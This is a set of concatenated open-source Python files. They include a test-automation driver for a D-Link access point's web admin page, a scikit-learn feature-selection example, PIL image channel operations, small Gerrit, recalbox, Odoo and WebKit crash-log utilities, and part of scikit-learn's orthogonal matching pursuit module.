def __init__(self, pyauto_instance, admin_interface_url):
super(DLinkAPConfigurator, self).__init__(pyauto_instance)
# Override constants
self.security_disabled = 'Disable Wireless Security (not recommended)'
self.security_wep = 'WEP'
self.security_wpapsk = 'WPA-Personal'
self.security_wpa2psk = 'WPA-Personal'
self.security_wpa8021x = 'WPA-Enterprise'
self.security_wpa28021x = 'WPA2-Enterprise'
self.admin_interface_url = admin_interface_url
def _OpenLandingPage(self):
self.pyauto_instance.NavigateToURL('http://%s/index.php' %
self.admin_interface_url)
page_name = os.path.basename(self.pyauto_instance.GetActiveTabURL().spec())
if page_name == 'login.php' or page_name == 'index.php':
try:
self._wait.until(lambda _: self._driver.find_element_by_xpath(
'//*[@name="login"]'))
except selenium.common.exceptions.TimeoutException, e:
# Maybe we were re-routes to the configuration page
if (os.path.basename(self.pyauto_instance.GetActiveTabURL().spec()) ==
'bsc_wizard.php'):
return
logging.exception('WebDriver exception: %s', str(e))
login_button = self._driver.find_element_by_xpath('//*[@name="login"]')
login_button.click()
def _OpenConfigurationPage(self):
self._OpenLandingPage()
if (os.path.basename(self.pyauto_instance.GetActiveTabURL().spec()) !=
'bsc_wizard.php'):
self.fail(msg='Taken to an unknown page %s' %
self.pyauto_instance.GetActiveTabURL().spec())
# Else we are being logged in automatically to the landing page
wlan = '//*[@name="wlan_wireless"]'
try:
self._wait.until(lambda _: self._driver.find_element_by_xpath(wlan))
except selenium.common.exceptions.TimeoutException, e:
logging.exception('WebDriver exception: %s', str(e))
wlan_button = self._driver.find_element_by_xpath(wlan)
wlan_button.click()
# Wait for the main configuration page, look for the radio button
try:
self._wait.until(lambda _: self._driver.find_element_by_xpath(
'id("enable")'))
except selenium.common.exceptions.TimeoutException, e:
logging.exception('Unable to find the radio button on the main landing '
'page.\nWebDriver exception: %s', str(e))
def GetRouterName(self):
return 'Router Name: DAP-1522; Class: DLinkAPConfigurator'
def GetRouterShortName(self):
return 'DAP-1522'
def GetNumberOfPages(self):
return 1
def GetSupportedBands(self):
return [{'band': self.band_2ghz,
'channels': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]},
{'band': self.band_5ghz,
'channels': [26, 40, 44, 48, 149, 153, 157, 161, 165]}]
def GetSupportedModes(self):
return [{'band': self.band_2ghz,
'modes': [self.mode_b, self.mode_g, self.mode_n,
self.mode_b | self.mode_g, self.mode_g | self.mode_n]},
{'band': self.band_5ghz,
'modes': [self.mode_a, self.mode_n, self.mode_a | self.mode_n]}]
def NavigateToPage(self, page_number):
# All settings are on the same page, so we always open the config page
self._OpenConfigurationPage()
return True
def SavePage(self, page_number):
# All settings are on the same page, we can ignore page_number
button = self._driver.find_element_by_xpath('//input[@name="apply"]')
button.click()
    # If we did not make changes we are sent to the continue screen.
continue_screen = True
button_xpath = '//input[@name="bt"]'
try:
self._wait.until(lambda _:
self._driver.find_element_by_xpath(button_xpath))
except selenium.common.exceptions.TimeoutException, e:
continue_screen = False
if continue_screen:
button = self._driver.find_element_by_xpath(button_xpath)
button.click()
# We will be returned to the landing page when complete
try:
self._wait.until(lambda _:
self._driver.find_element_by_xpath('id("enable")'))
except selenium.common.exceptions.TimeoutException, e:
logging.exception('Unable to find the radio button on the main landing '
'page.\nWebDriver exception: %s', str(e))
return False
return True
def SetMode(self, mode, band=None):
# Mode overrides the band. So if a band change is made after a mode change
# it may make an incompatible pairing.
self.AddItemToCommandList(self._SetMode, (mode, band), 1, 800)
def _SetMode(self, mode, band=None):
# Create the mode to popup item mapping
mode_mapping = {self.mode_b: '802.11b Only', self.mode_g: '802.11g Only',
self.mode_n: '802.11n Only',
self.mode_b | self.mode_g: 'Mixed 802.11g and 802.11b',
self.mode_n | self.mode_g: 'Mixed 802.11n and 802.11g',
                    self.mode_n | self.mode_g | self.mode_b:
                        'Mixed 802.11n, 802.11g, and 802.11b',
self.mode_a: '802.11a Only',
self.mode_n | self.mode_a: 'Mixed 802.11n and 802.11a'}
band_value = self.band_2ghz
if mode in mode_mapping.keys():
popup_value = mode_mapping[mode]
# If the mode contains 802.11a we use 5Ghz
if mode & self.mode_a == self.mode_a:
band_value = self.band_5ghz
# If the mode is 802.11n mixed with 802.11a it must be 5Ghz
elif mode & (self.mode_n | self.mode_a) == (self.mode_n | self.mode_a):
band_value = self.band_5ghz
      # If the mode is 802.11n mixed with something other than 802.11a it's 2Ghz
elif mode & self.mode_n == self.mode_n and mode ^ self.mode_n > 0:
band_value = self.band_2ghz
# If the mode is 802.11n then we default to 5Ghz unless there is a band
elif mode == self.mode_n:
band_value = self.band_5ghz
if band:
band_value = band
else:
      logging.exception('The mode selected %s is not supported by router %s.',
                        hex(mode), self.GetRouterName())
# Set the band first
self._SetBand(band_value)
popup_id = 'mode_80211_11g'
if band_value == self.band_5ghz:
popup_id = 'mode_80211_11a'
self.SelectItemFromPopupByID(popup_value, popup_id)
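  # Illustrative usage only (mode/band values assumed, not from the original):
  #   ap.SetMode(ap.mode_n | ap.mode_g, band=ap.band_2ghz)
  # queues the change through the command list; _SetMode resolves the band
  # automatically whenever the requested mode implies one.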
def SetRadio(self, enabled=True):
# If we are enabling we are activating all other UI components, do it first.
# Otherwise we are turning everything off so do it last.
if enabled:
weight = 1
else:
weight = 1000
# This disables all UI so it should be the last item to be changed
self.AddItemToCommandList(self._SetRadio, (enabled,), 1, weight)
def _SetRadio(self, enabled=True):
# The radio checkbox for this router always has a value of 1. So we need to
# use other methods to determine if the radio is on or not. Check if the
# ssid textfield is disabled.
ssid = self._driver.find_element_by_xpath('//input[@name="ssid"]')
if ssid.get_attribute('disabled') == 'true':
radio_enabled = False
else:
radio_enabled = True
if radio_enabled == enabled:
# Nothing to do
return
self.SetCheckBoxSelectedByID('enable', selected=False,
wait_for_xpath='id("security_type_ap")')
def SetSSID(self, ssid):
# Can be done as long as it is enabled
self.AddItemToCommandList(self._SetSSID, (ssid,), 1, 900)
def _SetSSID(self, ssid):
self._SetRadio(enabled=True)
self.SetContentOfTextFieldByID(ssid, 'ssid')
def SetChannel(self, channel):
self.AddItemToCommandList(self._SetChannel, (channel,), 1, 900)
def _SetChannel(self, channel):
self._SetRadio(enabled=True)
self.SetCheckBoxSelectedByID('autochann', selected=False)
self.SelectItemFromPopupByID(str(channel), 'channel_g')
# Experimental
def GetBand(self):
# The radio buttons do more than run a script that adjusts the possible
# channels. We will just check the channel to popup.
    self._SetRadio(enabled=True)
    xpath = 'id("channel_g")'
self._OpenConfigurationPage()
try:
self._wait.until(lambda _: self._driver.find_element_by_xpath(xpath))
except selenium.common.exceptions.TimeoutException, e:
logging.exception('WebDriver exception: %s', str(e))
element = self._driver.find_element_by_xpath(xpath)
if element.find_elements_by_tag_name('option')[0].text == '1':
return self.band_2ghz
return self.band_5ghz
def SetBand(self, band):
    if band != self.band_2ghz and band != self.band_5ghz:
self.fail(msg='Invalid band sent %s' % band)
self.AddItemToCommandList(self._SetBand, (band,), 1, 900)
def _SetBand(self, band):
self._SetRadio(enabled=True)
if band == self.band_2ghz:
int_value = 0
wait_for_xpath = 'id("mode_80211_11g")'
elif band == self.band_5ghz:
int_value = 1
wait_for_xpath = 'id("mode_80211_11a")'
xpath = ('//*[contains(@class, "l_tb")]/input[@value="%d" and @name="band"]'
% int_value)
element = self._driver.find_element_by_xpath(xpath)
element.click()
try:
self._wait.until(lambda _:
self._driver.find_element_by_xpath(wait_for_xpath))
except selenium.common.exceptions.TimeoutException, e:
logging.exception('The appropriate mode popup could not be found after '
'adjusting the band. WebDriver exception: %s', str(e))
def SetSecurityDisabled(self):
self.AddItemToCommandList(self._SetSecurityDisabled, (), 1, 900)
def _SetSecurityDisabled(self):
self._SetRadio(enabled=True)
self.SelectItemFromPopupByID(self.security_disabled, 'security_type_ap')
def SetSecurityWEP(self, key_value, authentication):
self.AddItemToCommandList(self._SetSecurityWEP, (key_value, authentication),
1, 900)
def _SetSecurityWEP(self, key_value, authentication):
self._SetRadio(enabled=True)
self.SelectItemFromPopupByID(self.security_wep, 'security_type_ap',
wait_for_xpath='id("auth_type")')
self.SelectItemFromPopupByID(authentication, 'auth_type',
wait_for_xpath='id("wep_key_value")')
self.SetContentOfTextFieldByID(key_value, 'wep_key_value')
self.SetContentOfTextFieldByID(key_value, 'verify_wep_key_value')
def SetSecurityWPAPSK(self, shared_key, update_interval=1800):
self.AddItemToCommandList(self._SetSecurityWPAPSK,
(shared_key, update_interval), 1, 900)
def _SetSecurityWPAPSK(self, shared_key, update_interval=1800):
self._SetRadio(enabled=True)
self.SelectItemFromPopupByID(self.security_wpapsk, 'security_type_ap',
wait_for_xpath='id("wpa_mode")')
self.SelectItemFromPopupByID('WPA Only', 'wpa_mode',
wait_for_xpath='id("grp_key_interval")')
self.SetContentOfTextFieldByID(str(update_interval), 'grp_key_interval')
self.SetContentOfTextFieldByID(shared_key, 'wpapsk1')
def SetVisibility(self, visible=True):
self.AddItemToCommandList(self._SetVisibility, (visible,), 1, 900)
def _SetVisibility(self, visible=True):
self._SetRadio(enabled=True)
# value=0 is visible; value=1 is invisible
int_value = 0
if not visible:
int_value = 1
xpath = ('//*[contains(@class, "l_tb")]/input[@value="%d" '
'and @name="visibility_status"]' % int_value)
element = self._driver.find_element_by_xpath(xpath)
element.click()
| bsd-3-clause |
RachitKansal/scikit-learn | examples/feature_selection/plot_rfe_with_cross_validation.py | 226 | 1384 | """
===================================================
Recursive feature elimination with cross-validation
===================================================
A recursive feature elimination example with automatic tuning of the
number of features selected with cross-validation.
"""
print(__doc__)
import matplotlib.pyplot as plt
from sklearn.svm import SVC
from sklearn.cross_validation import StratifiedKFold
from sklearn.feature_selection import RFECV
from sklearn.datasets import make_classification
# Build a classification task using 3 informative features
X, y = make_classification(n_samples=1000, n_features=25, n_informative=3,
n_redundant=2, n_repeated=0, n_classes=8,
n_clusters_per_class=1, random_state=0)
# Create the RFE object and compute a cross-validated score.
svc = SVC(kernel="linear")
# The "accuracy" scoring is proportional to the number of correct
# classifications
rfecv = RFECV(estimator=svc, step=1, cv=StratifiedKFold(y, 2),
scoring='accuracy')
rfecv.fit(X, y)
print("Optimal number of features : %d" % rfecv.n_features_)
# Plot number of features VS. cross-validation scores
plt.figure()
plt.xlabel("Number of features selected")
plt.ylabel("Cross validation score (nb of correct classifications)")
plt.plot(range(1, len(rfecv.grid_scores_) + 1), rfecv.grid_scores_)
plt.show()
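# Note on reading the plot (added remark, not part of the original example):
# with step=1, rfecv.grid_scores_[i] is the cross-validation score obtained
# when keeping i + 1 features, so the printed optimum should land near the
# 3 informative (plus 2 redundant) features built into the dataset above.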
| bsd-3-clause |
ambujone/breath-hackathon | gae/lib/PIL/ImageChops.py | 40 | 7411 | #
# The Python Imaging Library.
# $Id$
#
# standard channel operations
#
# History:
# 1996-03-24 fl Created
# 1996-08-13 fl Added logical operations (for "1" images)
# 2000-10-12 fl Added offset method (from Image.py)
#
# Copyright (c) 1997-2000 by Secret Labs AB
# Copyright (c) 1996-2000 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
import Image
##
# The <b>ImageChops</b> module contains a number of arithmetical image
# operations, called <i>channel operations</i> ("chops"). These can be
# used for various purposes, including special effects, image
# compositions, algorithmic painting, and more.
# <p>
# At this time, channel operations are only implemented for 8-bit
# images (e.g. "L" and "RGB").
# <p>
# Most channel operations take one or two image arguments and return
# a new image. Unless otherwise noted, the result of a channel
# operation is always clipped to the range 0 to MAX (which is 255 for
# all modes supported by the operations in this module).
##
##
# Return an image with the same size as the given image, but filled
# with the given pixel value.
#
# @param image Reference image.
# @param value Pixel value.
# @return An image object.
def constant(image, value):
"Fill a channel with a given grey level"
return Image.new("L", image.size, value)
##
# Copy image.
#
# @param image Source image.
# @return A copy of the source image.
def duplicate(image):
"Create a copy of a channel"
return image.copy()
##
# Inverts an image
# (MAX - image).
#
# @param image Source image.
# @return An image object.
def invert(image):
"Invert a channel"
image.load()
return image._new(image.im.chop_invert())
##
# Compare images, and return lighter pixel value
# (max(image1, image2)).
# <p>
# Compares the two images, pixel by pixel, and returns a new image
# containing the lighter values.
#
# @param image1 First image.
# @param image2 Second image.
# @return An image object.
def lighter(image1, image2):
"Select the lighter pixels from each image"
image1.load()
image2.load()
return image1._new(image1.im.chop_lighter(image2.im))
##
# Compare images, and return darker pixel value
# (min(image1, image2)).
# <p>
# Compares the two images, pixel by pixel, and returns a new image
# containing the darker values.
#
# @param image1 First image.
# @param image2 Second image.
# @return An image object.
def darker(image1, image2):
"Select the darker pixels from each image"
image1.load()
image2.load()
return image1._new(image1.im.chop_darker(image2.im))
##
# Calculate absolute difference
# (abs(image1 - image2)).
# <p>
# Returns the absolute value of the difference between the two images.
#
# @param image1 First image.
# @param image2 Second image.
# @return An image object.
def difference(image1, image2):
"Subtract one image from another"
image1.load()
image2.load()
return image1._new(image1.im.chop_difference(image2.im))
##
# Superimpose positive images
# (image1 * image2 / MAX).
# <p>
# Superimposes two images on top of each other. If you multiply an
# image with a solid black image, the result is black. If you multiply
# with a solid white image, the image is unaffected.
#
# @param image1 First image.
# @param image2 Second image.
# @return An image object.
def multiply(image1, image2):
"Superimpose two positive images"
image1.load()
image2.load()
return image1._new(image1.im.chop_multiply(image2.im))
##
# Superimpose negative images
# (MAX - ((MAX - image1) * (MAX - image2) / MAX)).
# <p>
# Superimposes two inverted images on top of each other.
#
# @param image1 First image.
# @param image2 Second image.
# @return An image object.
def screen(image1, image2):
"Superimpose two negative images"
image1.load()
image2.load()
return image1._new(image1.im.chop_screen(image2.im))
##
# Add images
# ((image1 + image2) / scale + offset).
# <p>
# Adds two images, dividing the result by scale and adding the
# offset. If omitted, scale defaults to 1.0, and offset to 0.0.
#
# @param image1 First image.
# @param image2 Second image.
# @return An image object.
def add(image1, image2, scale=1.0, offset=0):
"Add two images"
image1.load()
image2.load()
return image1._new(image1.im.chop_add(image2.im, scale, offset))
##
# Subtract images
# ((image1 - image2) / scale + offset).
# <p>
# Subtracts two images, dividing the result by scale and adding the
# offset. If omitted, scale defaults to 1.0, and offset to 0.0.
#
# @param image1 First image.
# @param image2 Second image.
# @return An image object.
def subtract(image1, image2, scale=1.0, offset=0):
"Subtract two images"
image1.load()
image2.load()
return image1._new(image1.im.chop_subtract(image2.im, scale, offset))
##
# Add images without clipping
# ((image1 + image2) % MAX).
# <p>
# Adds two images, without clipping the result.
#
# @param image1 First image.
# @param image2 Second image.
# @return An image object.
def add_modulo(image1, image2):
"Add two images without clipping"
image1.load()
image2.load()
return image1._new(image1.im.chop_add_modulo(image2.im))
##
# Subtract images without clipping
# ((image1 - image2) % MAX).
# <p>
# Subtracts two images, without clipping the result.
#
# @param image1 First image.
# @param image2 Second image.
# @return An image object.
def subtract_modulo(image1, image2):
"Subtract two images without clipping"
image1.load()
image2.load()
return image1._new(image1.im.chop_subtract_modulo(image2.im))
##
# Logical AND
# (image1 and image2).
def logical_and(image1, image2):
"Logical and between two images"
image1.load()
image2.load()
return image1._new(image1.im.chop_and(image2.im))
##
# Logical OR
# (image1 or image2).
def logical_or(image1, image2):
"Logical or between two images"
image1.load()
image2.load()
return image1._new(image1.im.chop_or(image2.im))
##
# Logical XOR
# (image1 xor image2).
def logical_xor(image1, image2):
"Logical xor between two images"
image1.load()
image2.load()
return image1._new(image1.im.chop_xor(image2.im))
##
# Blend images using constant transparency weight.
# <p>
# Same as the <b>blend</b> function in the <b>Image</b> module.
def blend(image1, image2, alpha):
"Blend two images using a constant transparency weight"
return Image.blend(image1, image2, alpha)
##
# Create composite using transparency mask.
# <p>
# Same as the <b>composite</b> function in the <b>Image</b> module.
def composite(image1, image2, mask):
"Create composite image by blending images using a transparency mask"
return Image.composite(image1, image2, mask)
##
# Offset image data.
# <p>
# Returns a copy of the image where data has been offset by the given
# distances. Data wraps around the edges. If yoffset is omitted, it
# is assumed to be equal to xoffset.
#
# @param image Source image.
# @param xoffset The horizontal distance.
# @param yoffset The vertical distance. If omitted, both
# distances are set to the same value.
# @return An Image object.
def offset(image, xoffset, yoffset=None):
"Offset image in horizontal and/or vertical direction"
if yoffset is None:
yoffset = xoffset
image.load()
return image._new(image.im.offset(xoffset, yoffset))
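##
# Usage sketch (not part of the original module; file names are assumed):
#
#   import Image, ImageChops
#   im1 = Image.open("frame1.png").convert("L")
#   im2 = Image.open("frame2.png").convert("L")
#   diff = ImageChops.difference(im1, im2)  # abs(im1 - im2), clipped to 0..MAX
#   if diff.getbbox() is None:
#       print "images are identical"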
| mit |
rcbau/hacks | gerrit/utility.py | 1 | 1291 | #!/usr/bin/python
import decimal
import types
import unicodedata
import urllib
def DisplayFriendlySize(bytes):
"""DisplayFriendlySize -- turn a number of bytes into a nice string"""
t = type(bytes)
if t != types.LongType and t != types.IntType and t != decimal.Decimal:
return 'NotANumber(%s=%s)' %(t, bytes)
if bytes < 1024:
return '%d bytes' % bytes
if bytes < 1024 * 1024:
return '%d kb (%d bytes)' %((bytes / 1024), bytes)
if bytes < 1024 * 1024 * 1024:
return '%d mb (%d bytes)' %((bytes / (1024 * 1024)), bytes)
return '%d gb (%d bytes)' %((bytes / (1024 * 1024 * 1024)), bytes)
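# Example (illustrative only):
#   DisplayFriendlySize(123456789L) returns '117 mb (123456789 bytes)'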
def Normalize(value):
normalized = unicodedata.normalize('NFKD', unicode(value))
normalized = normalized.encode('ascii', 'ignore')
return normalized
def read_remote_lines(url):
remote = urllib.urlopen(url)
data = ''
while True:
d = remote.read(100)
if not d:
break
data += d
if data.find('\n') != -1:
elems = data.split('\n')
for line in elems[:-1]:
yield line
data = elems[-1]
if data:
yield data
def read_remote_file(url):
data = []
for line in read_remote_lines(url):
data.append(line)
return '\n'.join(data)
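# Usage sketch (URL is a placeholder, not from the original):
#   for line in read_remote_lines('http://example.com/notes.txt'):
#       print line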
| apache-2.0 |
digitalLumberjack/recalbox-configgen | runtest/case.py | 2 | 2950 | '''
Created on Mar 6, 2016
@author: Laurent Marchelli
'''
import os
import sys
import shutil
import unittest
from . import dir_res, dir_tmp
class TestCase(unittest.TestCase):
args_dict = {}
@classmethod
def setUpClass(cls, system, emulator):
# Define test system configuration path
cls.path_init = os.path.join(dir_res, emulator)
cls.path_user = os.path.join(dir_tmp, emulator)
# Define test needed objects
lst_args = [
"p1index", "p1guid", "p1name", "p1devicepath",
"p2index", "p2guid", "p2name", "p2devicepath",
"p3index", "p3guid", "p3name", "p3devicepath",
"p4index", "p4guid", "p4name", "p4devicepath",
"p5index", "p5guid", "p5name", "p5devicepath",
"system", "rom", "emulator", "core", "demo",
]
lst_values = [None] * len(lst_args)
cls.args_dict = dict(zip(lst_args, lst_values))
cls.args_dict['system'] = system
cls.args_dict['emulator'] = emulator
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
# Cleanup previous test temporary files
if os.path.exists(self.path_user):
shutil.rmtree(self.path_user)
# Create test environment
os.makedirs(self.path_user)
# Copy class args into instance args to avoid corruption by
# test instances.
self.args = self.__class__.args_dict.copy()
def tearDown(self):
pass
def __init__(self, methodName='runTest', params=None, results=None, msg=None):
super(TestCase, self).__init__(methodName)
self.params = params
self.results = results
self.message = msg
def __str__(self):
msg = '' if self.message is None else '({})'.format(self.message)
return "{}.{}{}".format(self.__class__.__name__,
self._testMethodName, msg)
def assertDictContentEqual(self, d1, d2, msg=None):
        self.assertListEqual(sorted(d1.items()),
                             sorted(d2.items()), msg)
# Thanks to Rob Cowie (http://stackoverflow.com/users/46690/rob-cowie)
# From : http://stackoverflow.com/posts/6796752/revisions
class RedirectStdStreams(object):
def __init__(self, stdout=None, stderr=None):
self._stdout = stdout or sys.stdout
self._stderr = stderr or sys.stderr
def __enter__(self):
self.old_stdout, self.old_stderr = sys.stdout, sys.stderr
self.old_stdout.flush(); self.old_stderr.flush()
sys.stdout, sys.stderr = self._stdout, self._stderr
def __exit__(self, exc_type, exc_value, traceback):
self._stdout.flush(); self._stderr.flush()
sys.stdout = self.old_stdout
sys.stderr = self.old_stderr
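# Usage sketch (assumed caller code): silence a noisy call by sending both
# streams to /dev/null for the duration of the with-block.
#   devnull = open(os.devnull, 'w')
#   with RedirectStdStreams(stdout=devnull, stderr=devnull):
#       print('this goes nowhere')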
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4: | mit |
lombritz/odoo | addons/product_margin/__init__.py | 444 | 1092 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import wizard
import product_margin
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
gitromand/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/common/system/crashlogs.py | 117 | 5490 | # Copyright (c) 2011, Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import codecs
import re
class CrashLogs(object):
PID_LINE_REGEX = re.compile(r'\s+Global\s+PID:\s+\[(?P<pid>\d+)\]')
def __init__(self, host, results_directory=None):
self._host = host
self._results_directory = results_directory
def find_newest_log(self, process_name, pid=None, include_errors=False, newer_than=None):
if self._host.platform.is_mac():
return self._find_newest_log_darwin(process_name, pid, include_errors, newer_than)
elif self._host.platform.is_win():
return self._find_newest_log_win(process_name, pid, include_errors, newer_than)
return None
def _log_directory_darwin(self):
log_directory = self._host.filesystem.expanduser("~")
log_directory = self._host.filesystem.join(log_directory, "Library", "Logs")
if self._host.filesystem.exists(self._host.filesystem.join(log_directory, "DiagnosticReports")):
log_directory = self._host.filesystem.join(log_directory, "DiagnosticReports")
else:
log_directory = self._host.filesystem.join(log_directory, "CrashReporter")
return log_directory
def _find_newest_log_darwin(self, process_name, pid, include_errors, newer_than):
def is_crash_log(fs, dirpath, basename):
return basename.startswith(process_name + "_") and basename.endswith(".crash")
log_directory = self._log_directory_darwin()
logs = self._host.filesystem.files_under(log_directory, file_filter=is_crash_log)
first_line_regex = re.compile(r'^Process:\s+(?P<process_name>.*) \[(?P<pid>\d+)\]$')
errors = ''
for path in reversed(sorted(logs)):
try:
if not newer_than or self._host.filesystem.mtime(path) > newer_than:
f = self._host.filesystem.read_text_file(path)
match = first_line_regex.match(f[0:f.find('\n')])
if match and match.group('process_name') == process_name and (pid is None or int(match.group('pid')) == pid):
return errors + f
except IOError, e:
if include_errors:
errors += "ERROR: Failed to read '%s': %s\n" % (path, str(e))
except OSError, e:
if include_errors:
errors += "ERROR: Failed to read '%s': %s\n" % (path, str(e))
if include_errors and errors:
return errors
return None
def _find_newest_log_win(self, process_name, pid, include_errors, newer_than):
def is_crash_log(fs, dirpath, basename):
return basename.startswith("CrashLog")
logs = self._host.filesystem.files_under(self._results_directory, file_filter=is_crash_log)
errors = ''
for path in reversed(sorted(logs)):
try:
if not newer_than or self._host.filesystem.mtime(path) > newer_than:
log_file = self._host.filesystem.read_binary_file(path).decode('utf8', 'ignore')
match = self.PID_LINE_REGEX.search(log_file)
if match is None:
continue
if int(match.group('pid')) == pid:
return errors + log_file
except IOError, e:
print "IOError %s" % str(e)
if include_errors:
errors += "ERROR: Failed to read '%s': %s\n" % (path, str(e))
except OSError, e:
print "OSError %s" % str(e)
if include_errors:
errors += "ERROR: Failed to read '%s': %s\n" % (path, str(e))
except UnicodeDecodeError, e:
print "UnicodeDecodeError %s" % str(e)
if include_errors:
errors += "ERROR: Failed to decode '%s' as utf8: %s\n" % (path, str(e))
if include_errors and errors:
return errors
return None
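# Usage sketch (process name and pid are assumed; webkitpy normally supplies
# the Host object):
#   from webkitpy.common.host import Host
#   crash_log = CrashLogs(Host()).find_newest_log('DumpRenderTree', pid=1234)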
| bsd-3-clause |
tawsifkhan/scikit-learn | sklearn/linear_model/omp.py | 127 | 30417 | """Orthogonal matching pursuit algorithms
"""
# Author: Vlad Niculae
#
# License: BSD 3 clause
import warnings
from distutils.version import LooseVersion
import numpy as np
from scipy import linalg
from scipy.linalg.lapack import get_lapack_funcs
from .base import LinearModel, _pre_fit
from ..base import RegressorMixin
from ..utils import as_float_array, check_array, check_X_y
from ..cross_validation import check_cv
from ..externals.joblib import Parallel, delayed
import scipy
solve_triangular_args = {}
if LooseVersion(scipy.__version__) >= LooseVersion('0.12'):
# check_finite=False is an optimization available only in scipy >=0.12
solve_triangular_args = {'check_finite': False}
premature = """ Orthogonal matching pursuit ended prematurely due to linear
dependence in the dictionary. The requested precision might not have been met.
"""
def _cholesky_omp(X, y, n_nonzero_coefs, tol=None, copy_X=True,
return_path=False):
"""Orthogonal Matching Pursuit step using the Cholesky decomposition.
Parameters
----------
X : array, shape (n_samples, n_features)
Input dictionary. Columns are assumed to have unit norm.
y : array, shape (n_samples,)
Input targets
n_nonzero_coefs : int
Targeted number of non-zero elements
tol : float
Targeted squared error, if not None overrides n_nonzero_coefs.
copy_X : bool, optional
Whether the design matrix X must be copied by the algorithm. A false
value is only helpful if X is already Fortran-ordered, otherwise a
copy is made anyway.
return_path : bool, optional. Default: False
Whether to return every value of the nonzero coefficients along the
forward path. Useful for cross-validation.
Returns
-------
gamma : array, shape (n_nonzero_coefs,)
Non-zero elements of the solution
idx : array, shape (n_nonzero_coefs,)
Indices of the positions of the elements in gamma within the solution
vector
coef : array, shape (n_features, n_nonzero_coefs)
The first k values of column k correspond to the coefficient value
for the active features at that step. The lower left triangle contains
garbage. Only returned if ``return_path=True``.
n_active : int
Number of active features at convergence.
"""
if copy_X:
X = X.copy('F')
else: # even if we are allowed to overwrite, still copy it if bad order
X = np.asfortranarray(X)
min_float = np.finfo(X.dtype).eps
nrm2, swap = linalg.get_blas_funcs(('nrm2', 'swap'), (X,))
potrs, = get_lapack_funcs(('potrs',), (X,))
alpha = np.dot(X.T, y)
residual = y
gamma = np.empty(0)
n_active = 0
indices = np.arange(X.shape[1]) # keeping track of swapping
max_features = X.shape[1] if tol is not None else n_nonzero_coefs
if solve_triangular_args:
# new scipy, don't need to initialize because check_finite=False
L = np.empty((max_features, max_features), dtype=X.dtype)
else:
# old scipy, we need the garbage upper triangle to be non-Inf
L = np.zeros((max_features, max_features), dtype=X.dtype)
L[0, 0] = 1.
if return_path:
coefs = np.empty_like(L)
while True:
lam = np.argmax(np.abs(np.dot(X.T, residual)))
if lam < n_active or alpha[lam] ** 2 < min_float:
# atom already selected or inner product too small
warnings.warn(premature, RuntimeWarning, stacklevel=2)
break
if n_active > 0:
# Updates the Cholesky decomposition of X' X
L[n_active, :n_active] = np.dot(X[:, :n_active].T, X[:, lam])
linalg.solve_triangular(L[:n_active, :n_active],
L[n_active, :n_active],
trans=0, lower=1,
overwrite_b=True,
**solve_triangular_args)
v = nrm2(L[n_active, :n_active]) ** 2
if 1 - v <= min_float: # selected atoms are dependent
warnings.warn(premature, RuntimeWarning, stacklevel=2)
break
L[n_active, n_active] = np.sqrt(1 - v)
X.T[n_active], X.T[lam] = swap(X.T[n_active], X.T[lam])
alpha[n_active], alpha[lam] = alpha[lam], alpha[n_active]
indices[n_active], indices[lam] = indices[lam], indices[n_active]
n_active += 1
# solves LL'x = y as a composition of two triangular systems
gamma, _ = potrs(L[:n_active, :n_active], alpha[:n_active], lower=True,
overwrite_b=False)
if return_path:
coefs[:n_active, n_active - 1] = gamma
residual = y - np.dot(X[:, :n_active], gamma)
if tol is not None and nrm2(residual) ** 2 <= tol:
break
elif n_active == max_features:
break
if return_path:
return gamma, indices[:n_active], coefs[:, :n_active], n_active
else:
return gamma, indices[:n_active], n_active
def _gram_omp(Gram, Xy, n_nonzero_coefs, tol_0=None, tol=None,
copy_Gram=True, copy_Xy=True, return_path=False):
"""Orthogonal Matching Pursuit step on a precomputed Gram matrix.
    This function uses the Cholesky decomposition method.
Parameters
----------
Gram : array, shape (n_features, n_features)
Gram matrix of the input data matrix
Xy : array, shape (n_features,)
Input targets
n_nonzero_coefs : int
Targeted number of non-zero elements
tol_0 : float
Squared norm of y, required if tol is not None.
tol : float
